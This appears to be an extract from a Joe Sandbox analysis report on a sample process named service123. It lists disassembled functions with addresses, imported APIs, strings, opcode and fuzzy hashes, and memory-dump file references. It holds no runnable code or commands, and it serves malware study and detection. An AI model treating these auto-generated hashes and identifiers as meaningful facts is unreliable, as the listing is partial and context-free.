Associated: 00000006.00000002.4154373639.00000000002DE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154403325.00000000002E1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_service123.jbxd

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: ada1008d35e41e10e64cf9da6c6253745884d5c573850742e5c05c36619c67f5
Instruction ID: ab4085839406a54401af16c39bf6652190f0c73bb2a001835ee2426cd0fefe1d
Opcode Fuzzy Hash: ada1008d35e41e10e64cf9da6c6253745884d5c573850742e5c05c36619c67f5
Instruction Fuzzy Hash: ADE0ECB19147028AD7407F38C90A32ABAE1AB80300F498C6DE48C87345EB79DC5A9B52

Function 6C2F9293 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 6C2F929F
GetProcAddress.KERNEL32 ref: 6C2F92B3

Strings

advapi32.dll, xrefs: 6C2F9298
SystemFunction036, xrefs: 6C2F92A8

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: SystemFunction036$advapi32.dll
API String ID: 2574300362-1354007664
Opcode ID: 3e432659aaa1957e69358dd86ed06bacda3be063b665008071c51b3637a2580e
Instruction ID: 66cda61d2841fee58bf84718356ff619fe61b9b8281e9be94fd87df3c76422bd
Opcode Fuzzy Hash: 3e432659aaa1957e69358dd86ed06bacda3be063b665008071c51b3637a2580e
Instruction Fuzzy Hash: BAE046B2A982108BCB00BF78960604ABBF0BA06320F00492ED88997600E3388455CF9B

Function 6C2F1409 Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 482COMMON

Download Yara Rule

Strings

5, xrefs: 6C2F14D2

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID:
String ID: 5
API String ID: 0-2226203566
Opcode ID: a82f91f592c34a67d2a7b995bb9dcb420e6372d41a04551b9348bb0e21569c10
Instruction ID: 8b193d2e4c63cf31805a5df2998e1809074e997853c150f043e8adb16328f126
Opcode Fuzzy Hash: a82f91f592c34a67d2a7b995bb9dcb420e6372d41a04551b9348bb0e21569c10
Instruction Fuzzy Hash: 0A2204B56487898FC720CF29C48475AFBE1BF89308F51892EE8E997710D774E846CB42

Function 6C379CD0 Relevance: 6.4, APIs: 2, Strings: 2, Instructions: 366COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6C379D9C
memset.MSVCRT ref: 6C379DFE

Strings

8O<l0, xrefs: 6C379DA1, 6C379DBD
8O<l0, xrefs: 6C379FB0, 6C379FA4

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: memset
String ID: 8O<l0$8O<l0
API String ID: 2221118986-2101776391
Opcode ID: 1ea8b77e88e2f9958a07304ec5e4cf640bd91c74f1fda33e96272b89c2400a61
Instruction ID: eeefa8fcf62d9db7f1f0d717a620435f73c09a20eea5d4f355958102adb809dc
Opcode Fuzzy Hash: 1ea8b77e88e2f9958a07304ec5e4cf640bd91c74f1fda33e96272b89c2400a61
Instruction Fuzzy Hash: D1F15875609305CFC720CF29C58064AB7F5FF86319B298A5CE8589B714D73AE806CFA9

Function 6C2EA340 Relevance: 6.3, APIs: 5, Instructions: 98stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2EA3C5
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,6C2FC1CC), ref: 6C2EA3E0
free.MSVCRT ref: 6C2EA3EA

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: freememcpystrlen
String ID:
API String ID: 2208669145-0
Opcode ID: 768fe237bf8541f949a09fe19a024f017c2fd472f356a3645b39d626925cf39c
Instruction ID: 995fd1073793f4b4f005440afb60163919ae9c167ced35ea88437fdbf732be5b
Opcode Fuzzy Hash: 768fe237bf8541f949a09fe19a024f017c2fd472f356a3645b39d626925cf39c
Instruction Fuzzy Hash: 0A31C07120971ACBD301AF2AD48471BBFF1AFC9359F610A2CEDA467B40D3B1C8458B92

Function 6C3359F0 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 308COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C335B24
memchr.MSVCRT ref: 6C335B43

Part of subcall function 6C3A82D0: setlocale.MSVCRT ref: 6C3A82E5

Strings

-, xrefs: 6C335D22
., xrefs: 6C335B35

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: memchrmemcpysetlocale
String ID: -$.
API String ID: 4291329590-3807043784
Opcode ID: cd47cf14be3e12cc516b887e71d87ee803a08662d138ec8bbdb5a71bbe31aff9
Instruction ID: fc6d5f655c43699854077b857733cd68493a89cc70f7c692a740ca4c93f94e8a
Opcode Fuzzy Hash: cd47cf14be3e12cc516b887e71d87ee803a08662d138ec8bbdb5a71bbe31aff9
Instruction Fuzzy Hash: 76D117B19043598FCB00DFA8C48459EBBF1BF88318F158A2AE898EB755D734D945CF92

Function 6C335E30 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 306COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6C335F5E
memchr.MSVCRT ref: 6C335F7D

Part of subcall function 6C3A82D0: setlocale.MSVCRT ref: 6C3A82E5

Strings

., xrefs: 6C335F6F
6, xrefs: 6C336166

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: memchrmemcpysetlocale
String ID: .$6
API String ID: 4291329590-4089497287
Opcode ID: c00d82ee10eb63939e67b57c8cd375caa60c7eab1529fbab248413811a6114d4
Instruction ID: 8800421a08a52bf399c4226e696ac9161441c5c284ef8120fdf77886f068ccc0
Opcode Fuzzy Hash: c00d82ee10eb63939e67b57c8cd375caa60c7eab1529fbab248413811a6114d4
Instruction Fuzzy Hash: F0D117B19083599FCB00DFA8C48058EBBF1BF48314F15866AE8A8EB751D734D945CF92

Function 6C3B0D40 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 283stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C3B0D85

Strings

basic_string::append, xrefs: 6C3B0DFD, 6C3B0E09, 6C3B0EFC, 6C3B0FBC

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string::append
API String ID: 39653677-3811946249
Opcode ID: c45a8a50e69500c6743f05bfff1aa1c62d3a26cf2d2cd810eaff333568606f44
Instruction ID: bbdfa140842e8759ae05056303044111b4e45550d05af39ae9c47161cf050d41
Opcode Fuzzy Hash: c45a8a50e69500c6743f05bfff1aa1c62d3a26cf2d2cd810eaff333568606f44
Instruction Fuzzy Hash: FAA15CB5A056048FCB00EF28C58469EBBF1FF89354F50856DE898ABB44D734E849CF92

Function 6C34B080 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 153COMMON

Download Yara Rule

APIs

memmove.MSVCRT(00000000,?,?,6C34972F), ref: 6C34B0E6
memcpy.MSVCRT(?,?,?,?,?,?,6C34972F), ref: 6C34B151
memcpy.MSVCRT(00000000,?,?,6C34972F), ref: 6C34B198

Strings

basic_string::assign, xrefs: 6C34B1B3

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: basic_string::assign
API String ID: 1283327689-2385367300
Opcode ID: 865a5c0ca68a12a6dcf3cf95d9c14c6dfb0da0d35c5eaa09d4b169d710ac40f0
Instruction ID: 32af66cfa29b5f02deb94cb13de017499e8500b7f8d15088e6f9b287f3ac62a3
Opcode Fuzzy Hash: 865a5c0ca68a12a6dcf3cf95d9c14c6dfb0da0d35c5eaa09d4b169d710ac40f0
Instruction Fuzzy Hash: 68516A71B0AA158BD7149F29C48465EF7E5FF9531CB10C66DE4948BB28E7319805CF82

Function 6C3541C0 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 150COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6C354221
memcpy.MSVCRT ref: 6C35428F
memcpy.MSVCRT ref: 6C3542C8

Strings

basic_string::assign, xrefs: 6C3542E4

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: memcpy$memmove
String ID: basic_string::assign
API String ID: 1283327689-2385367300
Opcode ID: f5fe5354d54b24fcb5fbf1d2d25c4734dd6c74ee333a44847854661c89daf7bb
Instruction ID: 924492b7cd3c3aa2fd9aab2da895f0a9d19132e9e5dfd4f7ed73c08cc271265d
Opcode Fuzzy Hash: f5fe5354d54b24fcb5fbf1d2d25c4734dd6c74ee333a44847854661c89daf7bb
Instruction Fuzzy Hash: 1A51AF7170A6218FD708DF28D484A5AFBF5BF92308F90895DE4948B728E731D825CF92

Function 6C30E730 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 127stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C30E75A
wcslen.MSVCRT ref: 6C30E7CA

Strings

basic_string: construction from null is not valid, xrefs: 6C30E792, 6C30E802, 6C30E872

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: strlenwcslen
String ID: basic_string: construction from null is not valid
API String ID: 803329031-2991274800
Opcode ID: 086605a2487f6b1b81cc2d420428058ec7c659bfabcae91d1df98328f05832d4
Instruction ID: 2c171a70b3ff6a4dfca0e6b45d17cc4f1b12840b31300ff5b5065a49b32680d0
Opcode Fuzzy Hash: 086605a2487f6b1b81cc2d420428058ec7c659bfabcae91d1df98328f05832d4
Instruction Fuzzy Hash: F0417BF6B056148FCB00FF2CD48584ABBA0BF54614F164969E8C48B715E332E999CFD2

Function 6C30E331 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 115stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C30E35D
strlen.MSVCRT ref: 6C30E3AD

Strings

basic_string: construction from null is not valid, xrefs: 6C30E37F, 6C30E3CF, 6C30E41F

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string: construction from null is not valid
API String ID: 39653677-2991274800
Opcode ID: 269ca081aab08bf3b5dd77a67e7f92a448add4da65df8d66449c388349b246c7
Instruction ID: 4f07948a951ef3b6fff2b1f8afd430d80865c113b494f5a5805ba7b8717e3ef9
Opcode Fuzzy Hash: 269ca081aab08bf3b5dd77a67e7f92a448add4da65df8d66449c388349b246c7
Instruction Fuzzy Hash: 533132B17153648FCB10BF2CC48589ABBE4BF19618B0649ADE8C49B711D335DC59CF92

Function 6C2F9660 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 6C2F96B2
MultiByteToWideChar.KERNEL32 ref: 6C2F96F5

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: b62088f0b3b341fb02e9605bdb8d98cd1f3c626a0bcdf37b91c2b0de9ddbcbc2
Instruction ID: 7fef7e31474a2b9b88da543c7340022e50507a986c3ff4cf0c67c35b9cfbdad7
Opcode Fuzzy Hash: b62088f0b3b341fb02e9605bdb8d98cd1f3c626a0bcdf37b91c2b0de9ddbcbc2
Instruction Fuzzy Hash: DD31F4B46493468FD700EF29E18464AFBF0BF86319F14891DF8A487691D3B6D859CB42

Function 002D7C40 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 002D7C92
MultiByteToWideChar.KERNEL32 ref: 002D7CD5

Memory Dump Source

Source File: 00000006.00000002.4154326212.00000000002D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000006.00000002.4154283382.00000000002D0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154347821.00000000002DA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154373639.00000000002DE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000006.00000002.4154403325.00000000002E1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_2d0000_service123.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: 62ea9adb1e5c06debd77a7e47144dc0e0a9ae3418797c2f5a4ca9065ba6ce004
Instruction ID: 485934e779a0791b0d51fba0311153f548110b077fb2e806e982b27e6ad71af3
Opcode Fuzzy Hash: 62ea9adb1e5c06debd77a7e47144dc0e0a9ae3418797c2f5a4ca9065ba6ce004
Instruction Fuzzy Hash: 2A3106B051D3428FD710DF28D58426ABBF1BF85314F14891EE8948B350E3BADC59CB92

Function 6C2EF511 Relevance: 6.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C2EF5C1

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: ReleaseSemaphore
String ID:
API String ID: 452062969-0
Opcode ID: 6808e3a8b1b2941e9fe266a813401d8b992839a860d3dd17f0f066fd5dc6fc7c
Instruction ID: e01f9fe040be8a143ca341eb3d2c3f6d71d8643b9b5c521482302479b68d3d2f
Opcode Fuzzy Hash: 6808e3a8b1b2941e9fe266a813401d8b992839a860d3dd17f0f066fd5dc6fc7c
Instruction Fuzzy Hash: 6F414770B0A3028FDB00EF29E6847477BF4BB5A318F54861CEC585B298D335D846CBA2

Function 6C2EF6B0 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C2EF751

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: ReleaseSemaphore
String ID:
API String ID: 452062969-0
Opcode ID: 282f898ff38acafd5a3f844c3075b2a13f7917f4d07a06fd8952fcc54cdd5036
Instruction ID: 0b659bafac51d907c9670345b751d4e4891c5624b7bac604d14613914d42a7da
Opcode Fuzzy Hash: 282f898ff38acafd5a3f844c3075b2a13f7917f4d07a06fd8952fcc54cdd5036
Instruction Fuzzy Hash: 2D315870B4A3028FEB00EF2AE6847477BF0BB4A319F55865DEC549B694D335D405CBA2

Function 6C2EF9D1 Relevance: 6.1, APIs: 4, Instructions: 81synchronizationCOMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C2EFA72
CreateSemaphoreW.KERNEL32 ref: 6C2EFAB7
WaitForSingleObject.KERNEL32 ref: 6C2EFB00

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWait
String ID:
API String ID: 3817295960-0
Opcode ID: 2a8fc25de5a9a1b6639373fce5a1d4a804ef829b9c85ac8dfcc667107fd43c95
Instruction ID: 645483c2e965d6b9e107a1b78cd82d874b09d1a43afbead27876b1cda89c330c
Opcode Fuzzy Hash: 2a8fc25de5a9a1b6639373fce5a1d4a804ef829b9c85ac8dfcc667107fd43c95
Instruction Fuzzy Hash: 39313370B4A3069FDB00EF29D6847477BF4BB4A319F00861CE8989B384D335D9468BA2

Function 6C2EFB60 Relevance: 6.1, APIs: 4, Instructions: 76synchronizationCOMMON

Download Yara Rule

APIs

ReleaseSemaphore.KERNEL32 ref: 6C2EFBF2
CreateSemaphoreW.KERNEL32 ref: 6C2EFC37
WaitForSingleObject.KERNEL32 ref: 6C2EFC80

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154987183.000000006C40C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c2e0000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWait
String ID:
API String ID: 3817295960-0
Opcode ID: 195e2cd615474a4538873f9d5f411ffb36e221a6f8fb758a86c01e599e223c56
Instruction ID: 9aedd4ed56fbb2e14a0e44593b1ac4f0db3a1530b52b174deace9ff03c014620
Opcode Fuzzy Hash: 195e2cd615474a4538873f9d5f411ffb36e221a6f8fb758a86c01e599e223c56
Instruction Fuzzy Hash: 9A312670B493069FDB00EF29D6887077BF4BB4A359F60866CEC589B284C335D445CBA2

Function 6C2E55A8 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 64stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2E72FE

Strings

{parm#, xrefs: 6C2E72D9
this, xrefs: 6C2E55B3
}, xrefs: 6C2E7392

Memory Dump Source

Source File: 00000006.00000002.4154746923.000000006C2E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2E0000, based on PE: true

Associated: 00000006.00000002.4154719639.000000006C2E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154889139.000000006C3BD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154908766.000000006C3BF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154952694.000000006C408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.4154969690.000000006C409000.00000004.00000001.01000000.00000006.sdmpDownload File
